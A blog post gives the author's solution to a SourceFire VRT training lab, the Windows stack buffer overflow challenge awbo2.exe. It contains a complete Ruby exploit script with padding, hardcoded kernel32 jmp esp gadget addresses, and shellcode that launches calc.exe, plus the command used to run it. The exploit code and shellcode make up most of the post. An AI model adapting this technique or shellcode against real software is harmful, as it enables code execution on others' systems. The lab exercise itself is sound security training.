Solution: awbo2.exe
I was feeling bored on Saturday after the wif went to bed so I took a crack at the SourceFire VRT labs Advanced Windows Buffer Overflows. I started with the first one; below is the solution in ruby. The shellcode is provided on the Sourcefire website and all it does it exec calc.exe. This series of executables seems to be all local exploits with int3 staged for ease of debugging. Most of my time was spent in the debugger getting the space just right. I will post the rest of the solutions soon. Any questions?
#!/usr/bin/env ruby
#Jacob Hammack
#http://www.hammackj.com
read = [0x7C571931].pack('V') #kernel32 ADD BYTE PTR DS:[EAX],CL
jmpesp = [0x7C5725F3].pack('V') #kernel32 jmp esp
shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
print 'A' * 1024 + read + "JUNK" + jmpesp + shellcodeMicrosoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>ruby exploit.rb | awbo2.exeThen in your post mortem debugger will catch the int3 at the beginning of the program and click run and you might have this screen, the addresses are only valid on Windows 2000 SP4 Roll-up 1, I provided the instructions to find if you want to try and get it to work on anything else. I have not tried on anything except my VM.
